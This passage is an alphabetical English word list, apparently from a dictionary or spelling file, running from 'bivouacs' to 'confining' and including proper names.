bivouacs biweekly bizarre Bizet blab blabbed blabbermouth blabbermouths blabbing blabs black blackberries blackberry blackbird blackbirds blackboard blackboards Blackburn blacked blacken blackened blackening blackens blacker blackest Blackfeet Blackfoot Blackfoots blacking blackjack blackjacks blacklist blacklisted blacklisting blacklists blackly blackmail blackmailed blackmailer blackmailers blackmailing blackmails Blackman Blackmer blackness blackout blackouts blacks blacksmith blacksmiths Blackstone Blackwell Blackwells bladder bladders blade blades Blaine Blair Blake Blakey blamable blame blamed blameless blamelessness blamer blamers blames blameworthy blaming blanch Blanchard Blanche blanched blanches blanching bland blandly blandness blank blanked blanker blankest blanket blanketed blanketer blanketers blanketing blankets blanking blankly blankness blanks Blanton blare blared blares blaring blase blaspheme blasphemed blasphemes blasphemies blaspheming blasphemous blasphemously blasphemousness blasphemy blast blasted blaster blasters blasting blasts blatant blatantly Blatz blaze blazed blazer blazers blazes blazing bleach bleached bleacher bleachers bleaches bleaching bleak bleaker bleakly bleakness blear bleary bleat bleating bleats bled bleed bleeder bleeding bleedings bleeds Bleeker blemish blemishes blend blended blender blending blends Blenheim bless blessed blessing blessings blew blight blighted blimp blimps blind blinded blinder blinders blindfold blindfolded blindfolding blindfolds blinding blindingly blindly blindness blinds blink blinked blinker blinkers blinking blinks Blinn blip blips bliss blissful blissfully blister blistered blistering blisters blithe blithely blitz blitzes blitzkrieg blizzard blizzards bloat bloated bloater bloating bloats blob blobs bloc Bloch block blockade blockaded blockades blockading blockage blockages blocked blocker blockers blockhouse blockhouses blocking blocks blocs bloke blokes Blomberg Blomquist blond blonde blondes blonds blood bloodbath blooded bloodhound bloodhounds bloodied bloodiest bloodless bloods bloodshed bloodshot bloodstain bloodstained bloodstains bloodstream bloody bloom bloomed bloomers Bloomfield blooming Bloomington blooms blooper blossom blossomed blossoms blot blots blotted blotting blouse blouses blow blower blowers blowfish blowing blown blowout blows blowup blubber bludgeon bludgeoned bludgeoning bludgeons blue blueberries blueberry bluebird bluebirds bluebonnet bluebonnets bluefish blueness blueprint blueprints bluer blues bluest bluestocking bluff bluffing bluffs bluing bluish Blum Blumenthal blunder blunderbuss blundered blundering blunderings blunders blunt blunted blunter bluntest blunting bluntly bluntness blunts blur blurb blurred blurring blurry blurs blurt blurted blurting blurts blush blushed blushes blushing bluster blustered blustering blusters blustery Blythe boa boar board boarded boarder boarders boarding boardinghouse boardinghouses boards Boarsh boast boasted boaster boasters boastful boastfully boasting boastings boasts boat boater boaters boathouse boathouses boating boatload boatloads boatman boatmen boats boatsman boatsmen boatswain boatswains boatyard boatyards bob bobbed Bobbie bobbin bobbing bobbins Bobbsey bobby bobolink bobolinks Bobrow bobs bobwhite bobwhites Boca bode Bodenheim bodes bodice bodied bodies bodily Bodleian body bodybuilder bodybuilders bodybuilding bodyguard bodyguards bodyweight Boeing Boeotia Boeotian Boer Boers bog Bogart Bogartian bogeymen bogged boggle boggled boggles boggling Bogota bogs bogus Boheme Bohemia Bohemian Bohemianism Bohr boil boiled boiler boilerplate boilers boiling boils Bois Boise boisterous boisterously bold bolder boldest boldface boldly boldness Bolivia Bolivian boll Bologna Bolshevik Bolsheviks Bolshevism Bolshevist Bolshevistic Bolshoi bolster bolstered bolstering bolsters bolt bolted bolting Bolton bolts Boltzmann bomb bombard bombarded bombarding bombardment bombards bombast bombastic Bombay bombed bomber bombers bombing bombings bombproof bombs bonanza bonanzas Bonaparte Bonaventure bond bondage bonded bonder bonders bonding bonds bondsman bondsmen bone boned boner boners bones bonfire bonfires bong Bonham Boniface boning Bonn bonnet bonneted bonnets Bonneville Bonnie bonny Bontempo bonus bonuses bony boo boob booboo booby book bookcase bookcases booked booker bookers bookie bookies booking bookings bookish bookkeeper bookkeepers bookkeeping booklet booklets bookmark books bookseller booksellers bookshelf bookshelves bookstore bookstores bookworm boolean Booleans boom boomed boomerang boomerangs booming booms boon Boone Boonton boor boorish boors boos boost boosted booster boosting boosts boot bootable booted Bootes booth booths booting Bootle bootleg bootlegged bootlegger bootleggers bootlegging bootlegs boots bootstrap bootstrapped bootstrapping bootstraps booty booze borate borates borax Bordeaux bordello bordellos Borden border bordered bordering borderings borderland borderlands borderline borders bore Borealis Boreas bored boredom borer bores Borg boric boring Boris born borne Borneo boron borough boroughs Borroughs borrow borrowed borrower borrowers borrowing borrows Bosch Bose bosom bosoms Bosporus boss bossed bosses Bostitch Boston Bostonian Bostonians bosun Boswell Boswellize Boswellizes botanical botanist botanists botany botch botched botcher botchers botches botching both bother bothered bothering bothers bothersome Botswana bottle bottled bottleneck bottlenecks bottler bottlers bottles bottling bottom bottomed bottoming bottomless bottoms botulinus botulism Boucher bouffant bough boughs bought boulder boulders boulevard boulevards bounce bounced bouncer bounces bouncing bouncy bound boundaries boundary bounded bounden bounding boundless boundlessness bounds bounteous bounteously bounties bountiful bounty bouquet bouquets Bourbaki bourbon bourgeois bourgeoisie Bourne boustrophedon boustrophedonic bout boutique bouts Bouvier bovine bovines bow Bowditch bowdlerize bowdlerized bowdlerizes bowdlerizing Bowdoin bowed bowel bowels Bowen bower bowers Bowes bowing bowl bowled bowler bowlers bowline bowlines bowling bowls bowman bows bowstring bowstrings box boxcar boxcars boxed boxer boxers boxes Boxford boxing boxtop boxtops boxwood boy Boyce boycott boycotted boycotts Boyd boyfriend boyfriends boyhood boyish boyishness Boyle Boylston boys bra brace braced bracelet bracelets braces bracing bracket bracketed bracketing brackets brackish Bradbury Bradford Bradley Bradshaw Brady brae braes brag Bragg bragged bragger bragging brags Brahmaputra Brahms Brahmsian braid braided braiding braids Braille brain Brainard Brainards brainchild brained braining brains brainstem brainstems brainstorm brainstorms brainwash brainwashed brainwashes brainwashing brainy brake braked brakeman brakes braking bramble brambles brambly bran branch branched branches branching branchings Branchville brand branded Brandeis Brandel Brandenburg branding brandish brandishes brandishing Brandon brands Brandt brandy brandywine Braniff Brannon bras brash brashly brashness Brasilia brass brasses brassiere Brasstown brassy brat brats Braun bravado brave braved bravely braveness braver bravery braves bravest braving bravo bravos brawl brawler brawling brawn bray brayed brayer braying brays braze brazed brazen brazenly brazenness brazes brazier braziers Brazil Brazilian brazing Brazzaville breach breached breacher breachers breaches breaching bread breadboard breadboards breadbox breadboxes breaded breading breads breadth breadwinner breadwinners break breakable breakables breakage breakaway breakdown breakdowns breaker breakers breakfast breakfasted breakfaster breakfasters breakfasting breakfasts breaking breakpoint breakpoints breaks breakthrough breakthroughes breakthroughs breakup breakwater breakwaters breast breasted breasts breastwork breastworks breath breathable breathe breathed breather breathers breathes breathing breathless breathlessly breaths breathtaking breathtakingly breathy bred breech breeches breed breeder breeding breeds breeze breezes breezily breezy Bremen bremsstrahlung Brenda Brendan Brennan Brenner Brent Bresenham Brest brethren Breton Bretons Brett breve brevet breveted breveting brevets brevity brew brewed brewer breweries brewers brewery brewing brews Brewster Brian briar briars bribe bribed briber bribers bribery bribes bribing Brice brick brickbat bricked bricker bricklayer bricklayers bricklaying bricks bridal bride bridegroom brides bridesmaid bridesmaids Bridewell bridge bridgeable bridged bridgehead bridgeheads Bridgeport bridges Bridget Bridgetown Bridgewater bridgework bridging bridle bridled bridles bridling Brie brief briefcase briefcases briefed briefer briefest briefing briefings briefly briefness briefs Brien brier brig brigade brigades brigadier brigadiers Brigadoon brigantine Briggs Brigham bright brighten brightened brightener brighteners brightening brightens brighter brightest brightly brightness Brighton brigs brilliance brilliancy brilliant brilliantly Brillouin brim brimful brimmed brimming brimstone Brindisi brindle brindled brine bring bringer bringers bringing brings brink Brinkley brinkmanship briny Brisbane brisk brisker briskly briskness bristle bristled bristles bristling Bristol Britain Britannic Britannica britches British Britisher Britishly Briton Britons Brittany Britten brittle brittleness broach broached broaches broaching broad broadband broadcast broadcasted broadcaster broadcasters broadcasting broadcastings broadcasts broaden broadened broadener broadeners broadening broadenings broadens broader broadest broadly broadness broadside Broadway brocade brocaded broccoli brochure brochures Brock Broglie broil broiled broiler broilers broiling broils broke broken brokenly brokenness broker brokerage brokers Bromfield bromide bromides bromine Bromley bronchi bronchial bronchiole bronchioles bronchitis bronchus Brontosaurus Bronx bronze bronzed bronzes brooch brooches brood brooder brooding broods brook Brookdale Brooke brooked Brookfield Brookhaven Brookline Brooklyn Brookmont brooks broom brooms broomstick broomsticks broth brothel brothels brother brotherhood brotherliness brotherly brothers brought brow browbeat browbeaten browbeating browbeats brown Browne browned Brownell browner brownest Brownian brownie brownies browning brownish brownness browns brows browse browsing Bruce Bruckner Bruegel bruise bruised bruises bruising Brumidi brunch brunches brunette Brunhilde Bruno Brunswick brunt brush brushed brushes brushfire brushfires brushing brushlike brushy brusque brusquely Brussels brutal brutalities brutality brutalize brutalized brutalizes brutalizing brutally brute brutes brutish Bruxelles Bryan Bryant Bryce Bryn bubble bubbled bubbles bubbling bubbly Buchanan Bucharest Buchenwald Buchwald buck buckboard buckboards bucked bucket buckets bucking buckle buckled buckler buckles Buckley buckling Bucknell bucks buckshot buckskin buckskins buckwheat Bucky bucolic bud Budapest Budd budded Buddha Buddhism Buddhist Buddhists buddies budding buddy budge budged budges budget budgetary budgeted budgeter budgeters budgeting budgets budging buds Budweiser Budweisers Buehring Buena Buenos buff buffalo buffaloes buffer buffered buffering buffers buffet buffeted buffeting buffetings buffets buffoon buffoons buffs bug bugaboo Bugatti bugeyed bugged bugger buggers buggies bugging buggy bugle bugled bugler bugles bugling bugs Buick build builder builders building buildings builds buildup buildups built builtin Bujumbura bulb Bulba bulbs Bulgaria Bulgarian bulge bulged bulging bulk bulked bulkhead bulkheads bulks bulky bull bulldog bulldogs bulldoze bulldozed bulldozer bulldozes bulldozing bulled bullet bulletin bulletins bullets bullfrog bullied bullies bulling bullion bullish bullock bulls bullseye bully bullying bulwark bum bumble bumblebee bumblebees bumbled bumbler bumblers bumbles bumbling Bumbry bummed bumming bump bumped bumper bumpers bumping bumps bumptious bumptiously bumptiousness bums bun bunch bunched bunches bunching Bundestag bundle bundled bundles bundling Bundoora Bundy bungalow bungalows bungle bungled bungler bunglers bungles bungling bunion bunions bunk bunker bunkered bunkers bunkhouse bunkhouses bunkmate bunkmates bunks bunnies bunny buns Bunsen bunt bunted bunter bunters bunting bunts Bunyan buoy buoyancy buoyant buoyed buoys Burbank Burch burden burdened burdening burdens burdensome bureau bureaucracies bureaucracy bureaucrat bureaucratic bureaucrats bureaus burgeon burgeoned burgeoning burgess burgesses burgher burghers burglar burglaries burglarize burglarized burglarizes burglarizing burglarproof burglarproofed burglarproofing burglarproofs burglars burglary Burgundian Burgundies Burgundy burial buried buries Burke Burkes burl burlesque burlesques Burlingame Burlington burly Burma Burmese burn Burne burned burner burners Burnes Burnett Burnham burning burningly burnings burnish burnished burnishes burnishing burns Burnside Burnsides burnt burntly burntness burp burped burping burps Burr Burroughs burrow burrowed burrower burrowing burrows burrs bursa bursar bursitis burst burstiness bursting bursts bursty Burt Burton Burtt Burundi bury burying bus busboy busboys Busch bused buses bush bushel bushels bushes bushing Bushnell bushwhack bushwhacked bushwhacking bushwhacks bushy busied busier busiest busily business businesses businesslike businessman businessmen busing buss bussed busses bussing bust bustard bustards busted buster bustle bustling busts busy but butane butcher butchered butchers butchery butler butlers butt butte butted butter butterball buttercup buttered butterer butterers butterfat Butterfield butterflies butterfly buttering buttermilk butternut butters buttery buttes butting buttock buttocks button buttoned buttonhole buttonholes buttoning buttons buttress buttressed buttresses buttressing Buttrick butts butyl butyrate buxom Buxtehude Buxton buy buyer buyers buying buys buzz Buzzard buzzards buzzed buzzer buzzes buzzing buzzword buzzwords buzzy by bye Byers bygone bylaw bylaws byline bylines bypass bypassed bypasses bypassing byproduct byproducts Byrd Byrne Byron Byronic Byronism Byronize Byronizes bystander bystanders byte bytes byway byways byword bywords Byzantine Byzantinize Byzantinizes Byzantium cab cabal cabana cabaret cabbage cabbages cabdriver cabin cabinet cabinets cabins cable cabled cables cabling caboose Cabot cabs cache cached caches caching cackle cackled cackler cackles cackling cacti cactus cadaver cadence cadenced Cadillac Cadillacs cadres Cady Caesar Caesarian Caesarize Caesarizes cafe cafes cafeteria caffein caffeinated caffeine cage caged cager cagers cages caging Cahill caiman Cain Caine cairn Cairo cajole cajoled cajoles cajoling Cajun Cajuns cake caked cakes caking Calais calamities calamitous calamity Calceolaria calcify calcium CALCOMP CalComp Calcomp calculate calculated calculates calculating calculation calculations calculative calculator calculators calculi calculus Calcutta Calder caldera Caldwell Caleb calendar calendars calf calfskin Calgary Calhoun caliber calibers calibrate calibrated calibrates calibrating calibration calibrations calico California Californian Californians Caligula caliph caliphs Calkins call callable Callaghan Callahan Callan called caller callers calling calliope Callisto callous calloused callously callousness calls callus calm calmed calmer calmest calming calmingly calmly calmness calms caloric calorie calories calorimeter calorimetric calorimetry Caltech calumny Calvary calve Calvert calves Calvin Calvinist Calvinize Calvinizes calypso cam Cambodia Cambrian Cambridge Camden came camel Camelot camels Camembert camera cameraman cameramen cameras Cameron Cameroon Cameroun Camilla Camille Camino camouflage camouflaged camouflages camouflaging camp campaign campaigned campaigner campaigners campaigning campaigns Campbell Campbellsport camped camper campers campfire campground camping camps campsite campus campuses can Canaan Canada Canadian Canadianization Canadianizations Canadianize Canadianizes Canadians canal canals canaries canary Canaveral Canberra cancel canceled canceling cancellation cancellations cancels cancer cancerous cancers Candace candid candidacy candidate candidates Candide candidly candidness candied candies candle candlelight candler candles candlestick candlesticks Candlewick candor candy cane caner Canfield canine Canis canister canker cankerworm cannabis canned cannel canner canners cannery cannibal cannibalize cannibalized cannibalizes cannibalizing cannibals canning cannister cannisters cannon cannonball cannons cannot canny canoe canoes Canoga canon canonic canonical canonicalization canonicalize canonicalized canonicalizes canonicalizing canonically canonicals canons Canopus canopy cans cant Cantabrigian cantaloupe cantankerous cantankerously canteen Canterbury cantilever canto canton Cantonese cantons cantor cantors Canute canvas canvases canvass canvassed canvasser canvassers canvasses canvassing canyon canyons cap capabilities capability capable capably capacious capaciously capaciousness capacitance capacitances capacities capacitive capacitor capacitors capacity cape caper capers capes Capet Capetown capillary Capistrano capita capital capitalism capitalist capitalists capitalization capitalizations capitalize capitalized capitalizer capitalizers capitalizes capitalizing capitally capitals Capitan capitol Capitoline capitols capped capping Cappy caprice capricious capriciously capriciousness Capricorn caps Capsicum capstan capstone capsule captain captained captaining captains caption captions captivate captivated captivates captivating captivation captive captives captivity captor captors capture captured capturer capturers captures capturing Caputo capybara car Caracas caramel caravan caravans caraway carbohydrate carbolic Carboloy carbon carbonate carbonated carbonates carbonation Carbondale Carbone Carbones carbonic carbonization carbonize carbonized carbonizer carbonizers carbonizes carbonizing carbons carborundum carbuncle carcass carcasses carcinogen carcinogenic carcinoma card cardboard carder cardiac Cardiff cardinal cardinalities cardinality cardinally cardinals Cardiod cardiology cardiovascular cards care cared careen career careers carefree careful carefully carefulness careless carelessly carelessness cares caress caressed caresser caresses caressing caret caretaker Carey Cargill cargo cargoes Carib Caribbean caribou caricature caring Carl Carla Carleton Carletonian Carlin Carlisle Carlo carload Carlsbad Carlsbads Carlson Carlton Carlyle Carmela Carmen Carmichael carnage carnal carnation Carnegie carnival carnivals carnivore carnivorous carnivorously carol Carolina Carolinas Caroline Carolingian Carolinian Carolinians carols Carolyn carp Carpathia Carpathians carpenter carpenters carpentry carpet carpeted carpeting carpets carport Carr Carrara carriage carriages Carrie carried carrier carriers carries carrion Carroll carrot carrots Carruthers carry carrying carryover carryovers cars Carson cart carted cartel carter carters Cartesian Carthage Carthaginian cartilage carting cartographer cartographic cartography carton cartons cartoon cartoons cartridge cartridges carts cartwheel Carty Caruso carve carved carver carves carving carvings Casanova cascadable cascade cascaded cascades cascading case cased casement casements cases casework Casey cash cashed casher cashers cashes cashew cashier cashiers cashing cashmere casing casings casino cask casket caskets casks Caspian Cassandra casserole casseroles cassette Cassiopeia Cassite Cassites Cassius cassock cast caste caster casters castes castigate Castillo casting castle castled castles castor Castro Castroism casts casual casually casualness casuals casualties casualty cat cataclysmic Catalan Catalina catalog cataloged cataloger cataloging catalogs Catalonia catalyst catalysts catalytic catapult cataract catastrophe catastrophes catastrophic Catawba catch catchable catcher catchers catches catching categorical categorically categories categorization categorize categorized categorizer categorizers categorizes categorizing category cater catered caterer catering caterpillar caterpillars caters cathedral cathedrals Catherine Catherwood catheter catheters cathode cathodes Catholic Catholicism Catholicisms Catholics Cathy catlike catnip cats Catskill Catskills catsup cattail cattle cattleman cattlemen Caucasian Caucasians Caucasus Cauchy caucus caught cauldron cauldrons cauliflower caulk causal causality causally causation causations cause caused causer causes causeway causeways causing caustic causticly caustics caution cautioned cautioner cautioners cautioning cautionings cautions cautious cautiously cautiousness cavalier cavalierly cavalierness cavalry cave caveat caveats caved caveman cavemen Cavendish cavern cavernous caverns caves caviar cavil Caviness caving cavities cavity caw cawing Cayley Cayuga cease ceased ceaseless ceaselessly ceaselessness ceases ceasing Cecil Cecilia Cecropia cedar cede ceded ceding Cedric ceiling ceilings Celanese Celebes celebrate celebrated celebrates celebrating celebration celebrations celebrities celebrity celerity celery Celeste celestial celestially Celia cell cellar cellars celled cellist cellists cellophane cells cellular cellulose Celsius Celt Celtic Celticize Celticizes cement cemented cementing cements cemeteries cemetery Cenozoic censor censored censoring censors censorship censure censured censurer censures census censuses cent centaur centenary centennial center centered centering centerpiece centerpieces centers centigrade centimeter centimeters centipede centipedes central Centralia centralism centralist centralization centralize centralized centralizes centralizing centrally CENTREX Centrex centrifugal centrifuge centripetal centrist centroid cents centuries century Cepheus ceramic Cerberus cereal cereals cerebellum cerebral ceremonial ceremonially ceremonialness ceremonies ceremony Ceres CERN certain certainly certainties certainty certifiable certificate certificates certification certifications certified certifier certifiers certifies certify certifying Cervantes Cesare cessation cessations Cessna Cetus Ceylon Cezanne Cezannes Chablis Chablises Chad Chadwick chafe chafer chaff chaffer Chaffey chaffing chafing chagrin chain chained chaining chains chair chaired chairing chairlady chairman chairmen chairperson chairpersons chairs chairwoman chairwomen chalice chalices chalk chalked chalking chalks challenge challenged challenger challengers challenges challenging Chalmers chamber chambered chamberlain chamberlains chambermaid Chambers chameleon champagne Champaign champion championed championing champions championship championships Champlain chance chanced chancellor Chancellorsville chancery chances chancing chandelier chandeliers Chandigarh Chang change changeability changeable changeably changed changeover changer changers changes changing channel channeled channeling channelled channeller channellers channelling channels Channing chant chanted chanter chanticleer chanticleers Chantilly chanting chants Chao chaos chaotic chap chapel chapels chaperon chaperone chaperoned chaplain chaplains Chaplin Chapman chaps chapter chapters char character characteristic characteristically characteristics characterizable characterization characterizations characterize characterized characterizer characterizers characterizes characterizing characters charcoal charcoaled charge chargeable charged charger chargers charges charging chariot chariots charisma charismatic charitable charitableness charities charity Charlemagne Charlemagnes Charles Charleston Charley Charlie Charlotte Charlottesville charm charmed charmer charmers charming charmingly charms Charon chars chart Charta chartable charted charter chartered chartering charters charting chartings Chartres chartreuse charts Charybdis chase chased chaser chasers chases chasing chasm chasms chassis chaste chastely chasteness chastise chastised chastiser chastisers chastises chastising chastity chat chateau chateaus Chatham Chattahoochee Chattanooga chattel chatter chattered chatterer chattering chatters chatting chatty Chaucer chauffeur chauffeured Chauncey Chautauqua cheap cheapen cheapened cheapening cheapens cheaper cheapest cheaply cheapness cheat cheated cheater cheaters cheating cheats check checkable checkbook checkbooks checked checker checkerboard checkerboarded checkerboarding checkers checking checklist checkout checkpoint checkpoints checks checksum checksummed checksumming checksums checkup cheek cheekbone cheeks cheeky cheer cheered cheerer cheerful cheerfully cheerfulness cheerily cheeriness cheering cheerleader cheerless cheerlessly cheerlessness cheers cheery cheese cheesecloth cheeses cheesy cheetah chef chefs Chekhov Chelsea chemical chemically chemicals chemise chemist chemistries chemistry chemists Chen Cheney Cheng cherish cherished cherishes cherishing Cheriton Cherokee Cherokees cherries cherry cherub cherubim cherubs Cheryl Chesapeake Cheshire chess chest Chester Chesterfield Chesterton chestnut chestnuts chests Chevrolet Chevy chew chewed chewer chewers chewing chews Cheyenne Cheyennes Chiang chic Chicago Chicagoan Chicagoans Chicana Chicanas chicanery Chicano Chicanos chick chickadee chickadees Chickasaws chicken chickens chicks chide chided chides chiding chief chiefly chiefs chieftain chieftains chiffon child childbirth childhood childish childishly childishness childlike children Chile Chilean Chiles chili chill chilled chiller chillers chillier chilliness chilling chillingly chills chilly chime chimera chimes chimney chimneys chimpanzee chin China Chinaman Chinamen Chinas Chinatown Chinese Ching chink chinked chinks chinned chinner chinners chinning Chinook chins chintz chip chipmunk chipmunks Chippendale Chippewa chips chiropractor chirp chirped chirping chirps chisel chiseled chiseler chisels Chisholm chit chivalrous chivalrously chivalrousness chivalry Chloe chlorine chloroform chlorophyll chloroplast chloroplasts chock chocks chocolate chocolates Choctaw Choctaws choice choices choicest choir choirs choke choked choker chokers chokes choking cholera Chomsky choose chooser choosers chooses choosing chop Chopin chopped chopper choppers chopping choppy chops choral chord chordate chorded chording chords chore choreograph choreography chores choring chortle chorus chorused choruses chose chosen Chou chowder Chris Christ christen Christendom christened christening christens Christensen Christenson Christian Christiana Christianity Christianization Christianizations Christianize Christianizer Christianizers Christianizes Christianizing Christians Christiansen Christianson Christie Christina Christine Christlike Christmas Christoffel Christoph Christopher Christy chromatogram chromatograph chromatography chrome chromium chromosphere chronic chronicle chronicled chronicler chroniclers chronicles chronograph chronography chronological chronologically chronologies chronology chrysanthemum Chrysler chubbier chubbiest chubbiness chubby chuck chuckle chuckled chuckles chucks chum Chungking chunk chunks chunky church churches churchgoer churchgoing Churchill Churchillian churchly churchman churchmen churchwoman churchwomen churchyard churchyards churn churned churning churns chute chutes chutzpah cicada Cicero Ciceronian Ciceronianize Ciceronianizes cider cigar cigarette cigarettes cigars cilia Cincinnati cinder Cinderella cinders Cindy cinema cinematic Cinerama cinnamon cipher ciphers ciphertext ciphertexts circa Circe circle circled circles circlet circling circuit circuitous circuitously circuitry circuits circulant circular circularity circularly circulate circulated circulates circulating circulation circumcise circumcision circumference circumflex circumlocution circumlocutions circumnavigate circumnavigated circumnavigates circumpolar circumscribe circumscribed circumscribing circumscription circumspect circumspection circumspectly circumstance circumstanced circumstances circumstantial circumstantially circumvent circumventable circumvented circumventing circumvents circus circuses cistern cisterns citadel citadels citation citations cite cited cites cities citing citizen citizens citizenship Citroen citrus city cityscape citywide civet civic civics civil civilian civilians civility civilization civilizations civilize civilized civilizes civilizing civilly clad cladding claim claimable claimant claimants claimed claiming claims Claire clairvoyant clairvoyantly clam clamber clambered clambering clambers clamor clamored clamoring clamorous clamors clamp clamped clamping clamps clams clan clandestine clang clanged clanging clangs clank clannish clap clapboard Clapeyron clapping claps Clara Clare Claremont Clarence Clarendon clarification clarifications clarified clarifies clarify clarifying clarinet clarity Clark Clarke Clarridge clash clashed clashes clashing clasp clasped clasping clasps class classed classes classic classical classically classics classifiable classification classifications classified classifier classifiers classifies classify classifying classmate classmates classroom classrooms classy clatter clattered clattering Claude Claudia Claudio Claus clause Clausen clauses Clausius claustrophobia claustrophobic claw clawed clawing claws clay clays Clayton clean cleaned cleaner cleaners cleanest cleaning cleanliness cleanly cleanness cleans cleanse cleansed cleanser cleansers cleanses cleansing cleanup clear clearance clearances cleared clearer clearest clearing clearings clearly clearness clears Clearwater cleavage cleave cleaved cleaver cleavers cleaves cleaving cleft clefts clemency Clemens clement Clemente Clemson clench clenched clenches clergy clergyman clergymen clerical clerk clerked clerking clerks Cleveland clever cleverer cleverest cleverly cleverness cliche cliches click clicked clicking clicks client clientele clients cliff Clifford cliffs Clifton climate climates climatic climatically climatology climax climaxed climaxes climb climbed climber climbers climbing climbs clime climes clinch clinched clincher clinches cling clinging clings clinic clinical clinically clinician clinics clink clinked clinker Clint Clinton Clio clip clipboard clipped clipper clippers clipping clippings clips clique cliques clitoris Clive cloak cloakroom cloaks clobber clobbered clobbering clobbers clock clocked clocker clockers clocking clockings clocks clockwatcher clockwise clockwork clod clods clog clogged clogging clogs cloister cloisters clone cloned clones cloning close closed closely closeness closenesses closer closers closes closest closet closeted closets closeup closing closure closures clot cloth clothe clothed clothes clotheshorse clothesline clothing Clotho clotting cloture cloud cloudburst clouded cloudier cloudiest cloudiness clouding cloudless clouds cloudy clout clove clover cloves clown clowning clowns club clubbed clubbing clubhouse clubroom clubs cluck clucked clucking clucks clue clues Cluj clump clumped clumping clumps clumsily clumsiness clumsy clung cluster clustered clustering clusterings clusters clutch clutched clutches clutching clutter cluttered cluttering clutters Clyde Clytemnestra coach coached coacher coaches coaching coachman coachmen coagulate coal coalesce coalesced coalesces coalescing coalition coals coarse coarsely coarsen coarsened coarseness coarser coarsest coast coastal coasted coaster coasters coasting coastline coasts coat coated Coates coating coatings coats coattail coauthor coax coaxed coaxer coaxes coaxial coaxing cobalt Cobb cobble cobbler cobblers cobblestone COBOL Cobol cobra cobweb cobwebs coca cocaine Cochise Cochran Cochrane cock cocked cocking cockpit cockroach cocks cocktail cocktails cocky coco cocoa coconut coconuts cocoon cocoons cod Coddington coddle code coded codeine coder coders codes codeword codewords codfish codicil codification codifications codified codifier codifiers codifies codify codifying coding codings codpiece Cody coed coeditor coeducation coefficient coefficients coequal coerce coerced coerces coercible coercing coercion coercive coexist coexisted coexistence coexisting coexists cofactor coffee coffeecup coffeepot coffees coffer coffers Coffey coffin coffins Coffman cog cogent cogently cogitate cogitated cogitates cogitating cogitation cognac cognition cognitive cognitively cognizance cognizant cogs cohabitation cohabitations Cohen cohere cohered coherence coherent coherently coheres cohering cohesion cohesive cohesively cohesiveness Cohn cohort coil coiled coiling coils coin coinage coincide coincided coincidence coincidences coincident coincidental coincides coinciding coined coiner coining coins coke cokes colander Colby cold colder coldest coldly coldness colds Cole Coleman Coleridge Colette Colgate colicky coliform coliseum collaborate collaborated collaborates collaborating collaboration collaborations collaborative collaborator collaborators collagen collapse collapsed collapses collapsible collapsing collar collarbone collared collaring collars collate collateral colleague colleagues collect collected collectible collecting collection collections collective collectively collectives collector collectors collects college colleges collegian collegiate collide collided collides colliding collie Collier collies Collins collision collisions colloidal colloquia colloquial colloquium colloquy collusion Cologne Colombia Colombian Colombians Colombo colon colonel colonels colonial colonially colonials colonies colonist colonists colonization colonize colonized colonizer colonizers colonizes colonizing colons colony color Colorado colored colorer colorers colorful coloring colorings colorless colors colossal Colosseum colt colts Columbia Columbian Columbus column columnize columnized columnizes columnizing columns Comanche comb combat combatant combatants combated combating combative combats combed comber combers combination combinational combinations combinator combinatorial combinatorially combinatoric combinatorics combinators combine combined combines combing combings combining combs combustible combustion Comdex come comeback comedian comedians comedic comedies comedy comeliness comely comer comers comes comestible comet cometary comets comfort comfortabilities comfortability comfortable comfortably comforted comforter comforters comforting comfortingly comforts comic comical comically comics Cominform coming comings comma command commandant commandants commanded commandeer commander commanders commanding commandingly commandment commandments commando commands commas commemorate commemorated commemorates commemorating commemoration commemorative commence commenced commencement commencements commences commencing commend commendation commendations commended commending commends commensurate comment commentaries commentary commentator commentators commented commenting comments commerce commercial commercially commercialness commercials commission commissioned commissioner commissioners commissioning commissions commit commitment commitments commits committed committee committeeman committeemen committees committeewoman committeewomen committing commodities commodity commodore commodores common commonalities commonality commoner commoners commonest commonly commonness commonplace commonplaces commons commonwealth commonwealths commotion communal communally commune communes communicant communicants communicate communicated communicates communicating communication communications communicative communicator communicators communion communist communists communities community commutative commutativity commute commuted commuter commuters commutes commuting compact compacted compacter compactest compacting compaction compactly compactness compactor compactors compacts companies companion companionable companions companionship company comparability comparable comparably comparative comparatively comparatives comparator comparators compare compared compares comparing comparison comparisons compartment compartmentalize compartmentalized compartmentalizes compartmentalizing compartmented compartments compass compassion compassionate compassionately compatibilities compatibility compatible compatibles compatibly compel compelled compelling compellingly compels compendium compensate compensated compensates compensating compensation compensations compensatory compete competed competence competency competent competently competes competing competition competitions competitive competitively competitor competitors compilation compilations compile compiled compiler compilers compiles compiling complacency complain complained complainer complainers complaining complains complaint complaints complement complementary complemented complementer complementers complementing complements complete completed completely completeness completes completing completion completions complex complexes complexion complexities complexity complexly compliance compliant complicate complicated complicates complicating complication complications complicator complicators complicity complied compliment complimentary complimented complimenter complimenters complimenting compliments comply complying component componentry components componentwise compose composed composedly composer composers composes composing composite composites composition compositional compositions compost composure compound compounded compounding compounds comprehend comprehended comprehending comprehends comprehensibility comprehensible comprehension comprehensive comprehensively compress compressed compresses compressible compressing compression compressive compressor comprise comprised comprises comprising compromise compromised compromiser compromisers compromises compromising compromisingly Compton comptroller comptrollers compulsion compulsions compulsive compulsory compunction Compuserve computability computable computation computational computationally computations compute computed computer computerize computerized computerizes computerizing computers computes computing comrade comradely comrades comradeship con Conakry Conant concatenate concatenated concatenates concatenating concatenation concatenations concave conceal concealed concealer concealers concealing concealment conceals concede conceded concedes conceding conceit conceited conceits conceivable conceivably conceive conceived conceives conceiving concentrate concentrated concentrates concentrating concentration concentrations concentrator concentrators concentric concept conception conceptions concepts conceptual conceptualization conceptualizations conceptualize conceptualized conceptualizes conceptualizing conceptually concern concerned concernedly concerning concerns concert concerted concertmaster concerto concerts concession concessions conciliate conciliatory concise concisely conciseness conclave conclude concluded concludes concluding conclusion conclusions conclusive conclusively concoct concomitant concord concordant Concorde Concordia concourse concrete concretely concreteness concretes concretion concubine concur concurred concurrence concurrencies concurrency concurrent concurrently concurring concurs concussion condemn condemnation condemnations condemned condemner condemners condemning condemns condensation condense condensed condenser condenses condensing condescend condescending condition conditional conditionally conditionals conditioned conditioner conditioners conditioning conditions condom condone condoned condones condoning conduce conducive conduciveness conduct conductance conducted conducting conduction conductive conductivity conductor conductors conducts conduit cone cones Conestoga confectionery confederacy confederate confederates confederation confederations confer conferee conference conferences conferred conferrer conferrers conferring confers confess confessed confesses confessing confession confessions confessor confessors confidant confidants confide confided confidence confidences confident confidential confidentiality confidentially confidently confides confiding confidingly configurable configuration configurations configure configured configures configuring confine confined confinement confinements confiner confines confining 